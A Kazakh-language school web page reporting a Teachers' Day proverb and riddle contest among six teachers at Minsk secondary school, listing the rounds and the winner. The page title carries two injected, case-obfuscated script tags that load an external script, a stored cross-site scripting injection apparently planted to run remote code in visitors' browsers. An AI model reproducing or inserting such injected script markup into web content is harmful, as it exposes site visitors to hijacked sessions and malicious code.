«Мың бір мақал, жүз бір жұмбақ» сайысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.10.2019

«Ұстаздар күні» мерекесіне орай педагогикалық ұжыммен өткізілген

«Мың бір мақал, жүз бір жұмбақ» сайысының есебі

2019 – 2020 оқу жылы

 

Минск орта мектебінде 2 – қазан күні «Ұстаздар күні» мерекесіне орай педагогикалық ұжыммен «Мың бір мақал, жүз бір жұмбақ» сайысы өткізілді.

Мақсаты: халық ауыз әдебиетін орынды түрде қолдана білуге, шаршы топ алдында сөз жүйесін таба білу, оны дамытуға, тіл мәдениетіне, достық қарым – қатынасқа, өз ұлтын сүюге, халық мәдениетін жалғастыру.

Сайысқа 6 мұғалім қатысты:

Мақал – мәтел сайысына қатысушылар:

  1. Бодан Аскергул – қазақ тілі мен әдебиет пәнінің мұғалімі
  2. Теңсел Сандуғаш – ағылшын пәнінің мұғалімі
  3. Қуат Тілеуберді – тарих пәнінің мұғалімі

Жұмбақшылар сайысына қатысушылар:

  1. Тилеухан Сейтмұрат – математика пәнінің мұғалімі
  2. Хойшыбай Ғалия – тәрбиеші
  3. Шынар Тәттігүл – бастауыш сынып мұғалімі

Сайыс кезеңі 3 айналым бойынша, бірнішісі мақал – мәтел, екіншісі, жұмбақшылар болып сынға түсті.

Мақалшылар сайысы:

І. Мақал – мәтел сайысы. Берілген сөздерге байланысты мақал – мәтелдер айтылады.

ІІ. Мақал – мәтелдірдің жалғасын табу. (Әр қатысушыға 7 мақал-мәтел беріледі, мақал-мәтелден жаңылыспаған қатысушы жеңіске жетеді).

Жұмбақшылар сайысының кезеңдері:

І. Ойынға қатысушыларға жұмбақ жасырылады. (әр қатысушыға 4 жұмбақ)

ІІ. Жұмбақшылар бір – біріне жұмбақ жасырады.

Мақал – мәтел айтудан (Теңсел С.) және жұмбақ сайысында (Хойшыбай Ғ.) жеңіске жеткен жеңімпаздар ақтық мәреге шықты. Жұмбақшылар сайысының жеңімпазына жұмбақ жасырылады, ал мақал-мәтел сайысында жеңген жеңімпаз сол жұмбақтың шешіміне байланысты мақал айтады. Екіншісі, қазақ тіліндегі тұрақты тіркестердің мағынасын ашу.

Сайыс барысында «көрермендер көрімдігі» атты айдарда көрермен қауымға да мақал – мәтел мен жұмбақтар жасырылды.

Сайысқа қатысқан мұғалімдер арасынан өзінің тапқырлығы мен ой ұшқырлығымен ағылшын пәнінің мұғалімі Теңсел С. жеңіске жетті.

 

 

 

Тәрбие ісінің меңгерушісі:                      Сағит О.Д.

Просмотров: 1550


Пікір қосу



Деректерді қолтаңбаға қосу